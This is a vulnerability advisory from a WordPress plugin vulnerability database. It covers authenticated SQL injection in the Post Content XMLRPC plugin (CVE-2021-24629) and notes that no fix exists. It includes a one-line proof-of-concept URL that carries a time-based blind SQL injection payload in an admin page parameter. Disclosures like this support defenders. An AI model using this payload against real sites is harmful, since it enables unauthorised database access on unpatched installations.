WordPress Plugin Vulnerabilities

Post Content XMLRPC <= 1.0 - Admin+ SQL Injections

Description

The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections

Proof of Concept

https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)

Affects Plugins

post-content-xmlrpc

No known fix - plugin closed

References

CVE

CVE-2021-24629

URL

https://codevigilant.com/disclosure/2021/wp-plugin-post-content-xmlrpc/

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

fb42980c-93e5-42d5-a478-c2b348eaea67

Timeline

Publicly Published

2021-10-07 (about 10 months ago)

Added

2021-10-07 (about 10 months ago)

Last Updated

2022-04-12 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin